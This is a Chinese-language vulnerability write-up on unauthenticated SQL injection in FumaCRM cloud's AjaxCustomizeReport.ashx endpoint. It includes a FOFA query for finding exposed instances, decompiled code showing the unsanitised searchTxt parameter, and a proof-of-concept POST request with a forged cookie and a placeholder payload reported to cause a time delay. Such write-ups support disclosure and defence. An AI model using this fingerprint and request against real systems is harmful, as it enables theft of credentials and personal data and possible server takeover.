漏洞简介
上海孚盟软件有限公司是一家专业的外贸SaaS服务和行业解决方案提供商。其旗下产品孚盟云AjaxCustomizeReport.ashx接口存在多个SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
影响版本
fofa语法
app="孚盟软件-孚盟云"
漏洞分析
直接看 AjaxCustomizeReport.ashx 对应的dll文件 FumaCRM_BS.NewWeb.dll 里有关 AjaxCustomizeReport 方法的实现如下
public void ProcessRequest(HttpContext context)
{
context.Response.ContentType = "text/plain";
string str1 = context.Request["action"];
if (!string.IsNullOrEmpty(UserCookie.GetCookieValue("empId")))
{
this.userId = UserCookie.GetCookieValue("empId");
Helper.WriteLog("ShowCustomizeReportData userId:" + this.userId, "ddSaas");
this.userId = FumaCRM_BS.Utility.Encrypt.Encrypt.DesDecrypt(this.userId);
Helper.WriteLog("ShowCustomizeReportData DesDecrypt userId:" + this.userId, "ddSaas");
}
try
{
string str2 = "";
string str3 = str1;
if (!string.op_Equality(str3, "SetQueryConditionAndControlType"))
{
if (!string.op_Equality(str3, "GetMouldList"))
{
if (!string.op_Equality(str3, "GetCustomizeReportSelectItem"))
{
if (string.op_Equality(str3, "GetCustomizeReportDataPage"))
str2 = this.GetCustomizeReportDataPage(context);
}
else
str2 = this.GetCustomizeReportSelectItem(context);
}
else
str2 = this.GetMouldList(context);
}
else
str2 = this.SetQueryConditionAndControlType(context);
context.Response.Write(str2);
}
当action=GetMouldList时,看下GetMouldList方法的实现
private string GetMouldList(HttpContext context)
{
string mouldList = "";
DataTable table = this.dbHelper.Query($"select * from syMouldFile where BMouldType=4 and MouldName like '%{context.Request["searchTxt"]}%'").Tables[0];
if (((InternalDataCollectionBase) table.Rows).Count > 0)
{
TemplateDocument templateDocument = new TemplateDocument(AppDomain.CurrentDomain.BaseDirectory + "/m/Dingding/CustomizeReport/CustomizeReportSelectMould.html", Encoding.UTF8);
templateDocument.Variables.SetValue("dt", (object) table);
mouldList = templateDocument.GetRenderText();
}
return mouldList;
}
参数searchTxt未经过任何过滤或校验就被直接拼接进SQL语句中进行执行,从而造成SQL注入漏洞。
当action=GetCustomizeReportSelectItem时,一样的存在SQL注入漏洞

漏洞复现
POST /m/Dingding/Ajax/AjaxCustomizeReport.ashx HTTP/1.1
Host: fumacrm.mrxn.net
Cookie: UserCookie={"empId":"1"}
Content-Type: application/x-www-form-urlencoded
action=GetMouldList&searchTxt='SQLI_POC--

成功延时 4 秒

